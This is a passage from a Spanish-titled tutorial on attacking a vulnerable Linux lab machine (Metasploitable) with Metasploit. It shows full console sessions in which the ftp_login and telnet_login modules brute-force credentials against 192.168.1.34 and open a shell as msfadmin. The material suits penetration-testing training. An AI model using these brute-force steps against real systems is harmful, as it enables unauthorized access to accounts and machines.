Penetrando Sistemas bajo plataforma GNU/Linux (vulnerable) con MetaSploit FrameWork – Parte III

Name Current Setting Required Description

—- ————— ——– ———–

FTPPASS mozilla@example.com no The password for the specified username

FTPUSER anonymous no The username to authenticate as

RHOSTS yes The target address range or CIDR identifier

RPORT 21 yes The target port

THREADS 1 yes The number of concurrent threads

msf auxiliary(ftp_version) > use auxiliary/scanner/ftp/ftp_login

msf auxiliary(ftp_login) > show options

Module options (auxiliary/scanner/ftp/ftp_login):

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS yes The target address range or CIDR identifier

RPORT 21 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(ftp_login) > set PASS_FILE /home/adastra/UTILITIES/userPass.lst

PASS_FILE => /home/adastra/UTILITIES/userPass.lst

msf auxiliary(ftp_login) > set USER_FILE /home/adastra/UTILITIES/userlist.lst

USER_FILE => /home/adastra/UTILITIES/userlist.lst

msf auxiliary(ftp_login) > set STOP_ON_SUCCESS true

STOP_ON_SUCCESS => true

msf auxiliary(ftp_login) > set RHOSTS 192.168.1.34

RHOSTS => 192.168.1.34

msf auxiliary(ftp_login) > run

*] 192.168.1.34:21 – Starting FTP login sweep

[*] Connecting to FTP server 192.168.1.34:21…

[*] Connected to target FTP server.

[*] 192.168.1.34:21 – FTP Banner: ‘220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.34]\x0d\x0a’

[*] 192.168.1.34:21 – Attempting FTP login for ‘admin’:»

[*] 192.168.1.34:21 – Failed FTP login for ‘admin’:»

……………………..

[+] 192.168.1.34:21 – Successful FTP login for ‘msfadmin’:’msfadmin’

[*] 192.168.1.34:21 – User ‘msfadmin’ has READ/WRITE access

[*] 192.168.1.34:21 – Attempting FTP login for ‘admin’:’root’

[*] Connecting to FTP server 192.168.1.34:21…

[*] Connected to target FTP server.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

Name Current Setting Required Description

—- ————— ——– ———–

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS 192.168.1.34 yes The target address range or CIDR identifier

RPORT 23 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(telnet_login) > set PASS_FILE /home/adastra/UTILITIES/userPass.lst

PASS_FILE => /home/adastra/UTILITIES/userPass.lst

msf auxiliary(telnet_login) > set USERPASS_FILE /home/adastra/UTILITIES/userlist.lst

USERPASS_FILE => /home/adastra/UTILITIES/userlist.lst

msf auxiliary(telnet_login) > set STOP_ON_SUCCESS true

STOP_ON_SUCCESS => true

msf auxiliary(telnet_login) > run

[*] 192.168.1.34:23 Telnet – Attempting: »:»

[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:

[*] 192.168.1.34:23 Prompt: Password:

[*] 192.168.1.34:23 Result: Login incorrect

[*] 192.168.1.34:23 Telnet – Attempting: ‘admin’:»

[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:

[*] 192.168.1.34:23 Prompt: Password:

[*] 192.168.1.34:23 Result: Login incorrect

………………..

[*] 192.168.1.34:23 Telnet – Attempting: ‘msfadmin’:’msfadmin’

[*] 192.168.1.34:23 Banner: Ubuntu 8.04 metasploitable login:

[*] 192.168.1.34:23 Prompt: Password:

[*] 192.168.1.34:23 Result:

Last login: Tue May 17 16:22:51 EDT 2011 from 192.168.1.33 on pts/1 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ No mail. 1 failure since last login. Last was Tue 17 May 2011 05:42:07 PM EDT on pts/0.
msfadmin@metasploitable:~$

[+] 192.168.1.34 – SUCCESSFUL LOGIN msfadmin : msfadmin

[*] Command shell session 2 opened (192.168.1.33:57984 -> 192.168.1.34:23) at Tue May 17 23:42:18 +0200 2011

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed